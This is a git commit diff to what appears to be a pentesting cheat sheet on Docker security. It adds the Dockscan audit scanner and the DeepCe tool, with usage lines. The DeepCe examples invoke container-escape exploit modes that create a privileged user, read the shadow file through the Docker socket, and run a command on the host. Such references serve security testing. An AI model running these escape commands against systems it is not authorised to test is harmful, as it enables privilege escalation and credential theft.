Deepce - Docker Enumeration, Escalation of Privileges and Container Escapes

This commit is contained in:
Swissky 2020-12-06 18:59:43 +01:00
parent 27050f6dd8
commit f48ee0bca5

View File

@ -15,11 +15,18 @@
## Tools
* Dockscan : https://github.com/kost/dockscan
* [Dockscan](https://github.com/kost/dockscan) : Dockscan is security vulnerability and audit scanner for Docker installations
```powershell
dockscan unix:///var/run/docker.sock
dockscan -r html -o myreport -v tcp://example.com:5422
```
* [DeepCe](https://github.com/stealthcopter/deepce) : Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)
```powershell
./deepce.sh
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
./deepce.sh --no-enumeration --exploit SOCK --shadow
./deepce.sh --no-enumeration --exploit DOCKER --command "whoami>/tmp/hacked"
```
## Mounted Docker Socket